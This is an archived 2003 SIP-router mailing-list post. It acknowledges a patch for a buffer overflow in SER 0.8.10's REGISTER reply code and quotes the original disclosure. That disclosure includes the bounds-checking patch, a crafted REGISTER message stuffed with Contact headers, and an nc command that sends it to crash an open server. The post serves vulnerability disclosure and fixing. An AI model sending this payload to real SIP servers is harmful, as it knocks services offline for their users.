[Serusers] [HEADS UP] security vulnerability in ser 0.8.10
Jan Janak
J.Janak at sh.cvut.cz
Sat Jan 18 12:02:12 CET 2003
Thanks, I applied the patch. The function was marked on my todo list as
"to be rewritten", your patch saves me some time.
regards, Jan.
On 18-01 03:41, Maxim Sobolev wrote:
> Folks,
>
> While playing with SER I found that I can trigger repeatable crash when
> doing REGISTER multiple times. Quick glance at the code in question
> revealed that indeed, when constructing reply to REGISTER message,
> SER uses fixed-lengh buffer to put all non-expired contacts for that
> user and doesn't bother to check for overflow. The bug could be easily
> exploited by a complete stranger on servers that don't perform
> authentification of REGISTER requests, and by an user with a valid
> credintals on server that do authentification. Mounting attack leads
> to denial of service.
>
> Attached please find fake REGISTER message, which if sent to open
> server kills it (nc -u my.sip.server 5060 < register.killser),
> and patch to fix the problem.
>
> -Maxim
>
> $FreeBSD$
>
> --- modules/registrar/reply.c 2003/01/18 00:39:05 1.1
> +++ modules/registrar/reply.c 2003/01/18 01:13:13
> @@ -53,32 +53,57 @@
> */
> void build_contact(ucontact_t* _c)
> {
> + char *lastgoodend;
> + int nummissed;
> +
> l = 0;
> + lastgoodend = b;
> while(_c) {
> if (_c->expires > act_time) {
> + if (l + 10 >= MAX_CONTACT_BUFFER)
> + break;
> memcpy(b + l, "Contact: <", 10);
> l += 10;
>
> + if (l + _c->c.len >= MAX_CONTACT_BUFFER)
> + break;
> memcpy(b + l, _c->c.s, _c->c.len);
> l += _c->c.len;
>
> + if (l + 4 >= MAX_CONTACT_BUFFER)
> + break;
> memcpy(b + l, ">;q=", 4);
> l += 4;
>
> - l += sprintf(b + l, "%-3.2f", _c->q);
> + l += snprintf(b + l, MAX_CONTACT_BUFFER - l, "%-3.2f", _c->q);
> + if (l >= MAX_CONTACT_BUFFER)
> + break;
>
> + if (l + 9 >= MAX_CONTACT_BUFFER)
> + break;
> memcpy(b + l, ";expires=", 9);
> l += 9;
>
> - l += sprintf(b + l, "%d", (int)(_c->expires - act_time));
> -
> + l += snprintf(b + l, MAX_CONTACT_BUFFER - l, "%d", (int)(_c->expires - act_time));
> + if (l >= MAX_CONTACT_BUFFER)
> + break;
> +
> + if (l + 2 >= MAX_CONTACT_BUFFER)
> + break;
> *(b + l++) = '\r';
> *(b + l++) = '\n';
> + lastgoodend = b + l;
> }
>
> _c = _c->next;
> }
> -
> + if (lastgoodend - b != l) {
> + l = lastgoodend - b;
> + for(nummissed = 0; _c; _c = _c->next)
> + nummissed++;
> + LOG(L_ERR, "build_contact(): Contact list buffer exhaused, %d contact(s) ignored\n", nummissed);
> + }
> +
> DBG("build_contact(): Created Contact HF: %.*s\n", l, b);
> }
>
> REGISTER sip:127.0.0.1 SIP/2.0
> Via: SIP/2.0/UDP 127.0.0.2:123;branch=z9hG4bKnashds7
> Max-Forwards: 70
> To: Bob <sip:bob at biloxi.com>
> From: Bob <sip:bob at biloxi.com>;tag=456248
> Call-ID: 843817637684230 at 998sdasdh09
> CSeq: 1826 REGISTER
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Expires: 7200
> Content-Length: 0
> User-Agent: Cisco ATA v2.15 ata186 (020918a)
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: not available
URL: <http://lists.sip-router.org/pipermail/sr-users/attachments/20030118/03cde411/attachment.pgp>
More information about the sr-users
mailing list